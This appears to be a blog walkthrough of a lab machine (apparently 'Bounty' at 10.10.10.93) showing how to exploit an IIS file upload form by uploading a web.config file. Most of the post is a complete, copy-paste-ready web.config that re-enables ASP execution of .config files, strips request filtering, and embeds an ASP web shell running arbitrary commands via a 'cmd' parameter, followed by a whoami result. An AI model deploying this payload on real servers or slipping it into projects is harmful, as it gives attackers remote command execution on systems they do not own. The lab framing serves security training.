In this post I will tell you how to hack windows server by uploading web config file.

Attacking Environment

To demonstrate this hack, I have a vulnerable machine setup locally running on ip 10.10.10.93.

This windows machine hosts a web server on port 80. The web server implements a file upload functionality which is what we are going to exploit in this post.

Agenda

Our agenda for this post is to exploit the file upload functionality hosted on web server to upload our webshell. We will do so by uploading a web.config file.

Hacking Windows server

To begin with, we had a file upload functionality on the web server.

We tried to upload our aspx shell normally through the file upload functionality on the web server but it failed. We also tried some well known tricks and techniques to bypass the file restrictions but nothing worked.

At last we tried to upload a web.config file and it worked. If you are not aware of what a web config file is, it is the main configuration file for ASP based applications which stores all the settings and configurations for web application. You may consider it as a simple xml file contaning all the configurations for the web application.

After uploading the web config file we browsed to the location where the application was storing the uploaded files. Here we see the code in our web config file is executed as it prints 3 on the screen.

Now that we know our code gets executed let’s try to get a webshell from it. Copy and paste the text below to the web.config file.

<?xml version=”1.0″ encoding=”UTF-8″?>
<configuration>
<system.webServer>
<handlers accessPolicy=”Read, Script, Write”>
<add name=”web_config” path=”*.config” verb=”*” modules=”IsapiModule” scriptProcessor=”%windir%\system32\inetsrv\asp.dll” resourceType=”Unspecified” requireAccess=”Write” preCondition=”bitness64″ />
</handlers>
<security>
<requestFiltering>
<fileExtensions>
<remove fileExtension=”.config” />
</fileExtensions>
<hiddenSegments>
<remove segment=”web.config” />
</hiddenSegments>
</requestFiltering>
</security>
</system.webServer>
</configuration>
<%
Set oScript = Server.CreateObject(“WSCRIPT.SHELL”)
Set oScriptNet = Server.CreateObject(“WSCRIPT.NETWORK”)
Set oFileSys = Server.CreateObject(“Scripting.FileSystemObject”)

Function getCommandOutput(theCommand)

Dim objShell, objCmdExec
Set objShell = CreateObject(“WScript.Shell”)
Set objCmdExec = objshell.exec(thecommand)
getCommandOutput = objCmdExec.StdOut.ReadAll

end Function

%>

 

<HTML>
<BODY>
<FORM action=”” method=”GET”>
<input type=”text” name=”cmd” size=45 value=”<%= szCMD %>”>
<input type=”submit” value=”Run”>
</FORM>
<PRE>
<%= “\\” & oScriptNet.ComputerName & “\” & oScriptNet.UserName %>
<%Response.Write(Request.ServerVariables(“server_name”))%>
<p>
<b>The server’s port:</b>
<%Response.Write(Request.ServerVariables(“server_port”))%>
</p>
<p>
<b>The server’s software:</b>
<%Response.Write(Request.ServerVariables(“server_software”))%>
</p>
<p>
<b>The server’s software:</b>
<%Response.Write(Request.ServerVariables(“LOCAL_ADDR”))%>
<% szCMD = request(“cmd”)
thisDir = getCommandOutput(“cmd /c” & szCMD)
Response.Write(thisDir)%>
</p>
<br>
</BODY>
</HTML>

We uploaded the web.config file given above to get our web shell.

Now that we have a web shell on the machine let’s try to see whoami.

As you see I am user merlin on this particular machine named bounty.

That’s it for this post. We have got access to the machine and now we can run any command of our choice on this machine.



Note: Use Virtual Machine and scan on VirusTotal before downloading any program on Host Machine for your privacy.